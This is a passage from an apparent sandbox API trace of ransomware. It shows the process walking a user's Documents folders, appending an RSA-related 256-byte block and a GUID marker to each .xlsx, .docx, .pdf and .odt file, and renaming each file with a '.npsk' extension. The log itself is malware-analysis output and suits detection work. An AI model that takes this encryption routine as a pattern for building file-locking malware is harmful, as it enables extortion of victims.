hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.054] GetLastError () returned 0x0 [0217.054] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.054] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.054] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.054] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.054] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.055] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.055] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc568, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.055] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.055] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.056] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.056] CloseHandle (hObject=0x61c) returned 1 [0217.057] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\W5VT.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\w5vt.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\W5VT.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\w5vt.xlsx.npsk")) returned 1 [0217.062] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b5c38b0, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xf67b1b0, ftLastAccessTime.dwHighDateTime=0x1d5d868, ftLastWriteTime.dwLowDateTime=0xf67b1b0, ftLastWriteTime.dwHighDateTime=0x1d5d868, nFileSizeHigh=0x0, nFileSizeLow=0x14c4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZsEVV2Vmf.docx", cAlternateFileName="ZSEVV2~1.DOC")) returned 1 [0217.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ZsEVV2Vmf.docx") returned=".docx" [0217.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ZsEVV2Vmf.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\zsevv2vmf.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.062] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=85068) returned 1 [0217.062] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.064] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14c26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.064] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.066] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x14c4c, lpOverlapped=0x0) returned 1 [0217.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.068] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.069] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.069] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.069] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.069] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.069] GetLastError () returned 0x0 [0217.069] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.069] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.069] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.069] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.069] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.070] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.071] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14c4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.071] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.071] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.071] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.071] CloseHandle (hObject=0x61c) returned 1 [0217.077] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ZsEVV2Vmf.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\zsevv2vmf.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\ZsEVV2Vmf.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\zsevv2vmf.docx.npsk")) returned 1 [0217.079] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x431113b0, ftCreationTime.dwHighDateTime=0x1d5df09, ftLastAccessTime.dwLowDateTime=0xeba0cc0, ftLastAccessTime.dwHighDateTime=0x1d5dd6f, ftLastWriteTime.dwLowDateTime=0xeba0cc0, ftLastWriteTime.dwHighDateTime=0x1d5dd6f, nFileSizeHigh=0x0, nFileSizeLow=0x1194a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gOP_pd_4Z3gtYP.pdf", cAlternateFileName="_GOP_P~1.PDF")) returned 1 [0217.079] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\_gOP_pd_4Z3gtYP.pdf") returned=".pdf" [0217.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\_gOP_pd_4Z3gtYP.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\_gop_pd_4z3gtyp.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.080] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=72010) returned 1 [0217.080] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.082] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11924, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.082] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.084] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1194a, lpOverlapped=0x0) returned 1 [0217.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.085] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.085] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.086] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.086] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.087] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.087] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.087] GetLastError () returned 0x0 [0217.087] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.087] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.087] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.087] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.087] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.088] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.088] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1194a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.088] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.089] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.089] CloseHandle (hObject=0x61c) returned 1 [0217.091] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\_gOP_pd_4Z3gtYP.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\_gop_pd_4z3gtyp.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\lMexzd9nHZj622T267Je\\_gOP_pd_4Z3gtYP.pdf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\lmexzd9nhzj622t267je\\_gop_pd_4z3gtyp.pdf.npsk")) returned 1 [0217.093] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x431113b0, ftCreationTime.dwHighDateTime=0x1d5df09, ftLastAccessTime.dwLowDateTime=0xeba0cc0, ftLastAccessTime.dwHighDateTime=0x1d5dd6f, ftLastWriteTime.dwLowDateTime=0xeba0cc0, ftLastWriteTime.dwHighDateTime=0x1d5dd6f, nFileSizeHigh=0x0, nFileSizeLow=0x1194a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gOP_pd_4Z3gtYP.pdf", cAlternateFileName="_GOP_P~1.PDF")) returned 0 [0217.093] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.094] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.094] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\") returned="zwRzh\\" [0217.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\") returned="y5VbixHYeFSBUXkYrU1j\\" [0217.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0217.094] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.094] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.094] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.094] PathFindFileNameW (pszPath="") returned="" [0217.094] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf1afe70, ftCreationTime.dwHighDateTime=0x1d5e0fe, ftLastAccessTime.dwLowDateTime=0xf27b6ec0, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0xf27b6ec0, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.097] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf1afe70, ftCreationTime.dwHighDateTime=0x1d5e0fe, ftLastAccessTime.dwLowDateTime=0xf27b6ec0, ftLastAccessTime.dwHighDateTime=0x1d5de16, ftLastWriteTime.dwLowDateTime=0xf27b6ec0, ftLastWriteTime.dwHighDateTime=0x1d5de16, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.097] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe980e10, ftCreationTime.dwHighDateTime=0x1d5e096, ftLastAccessTime.dwLowDateTime=0xd8b61080, ftLastAccessTime.dwHighDateTime=0x1d5dc81, ftLastWriteTime.dwLowDateTime=0xd8b61080, ftLastWriteTime.dwHighDateTime=0x1d5dc81, nFileSizeHigh=0x0, nFileSizeLow=0x715a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4_7NiL_XEbD7R_E.odt", cAlternateFileName="4_7NIL~1.ODT")) returned 1 [0217.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\4_7NiL_XEbD7R_E.odt") returned=".odt" [0217.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\4_7NiL_XEbD7R_E.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\4_7nil_xebd7r_e.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.100] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=29018) returned 1 [0217.100] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.102] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x7134, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.102] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.104] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x715a, lpOverlapped=0x0) returned 1 [0217.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.104] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.105] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.106] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.106] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.106] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.106] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.106] GetLastError () returned 0x0 [0217.106] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.106] CryptReleaseContext 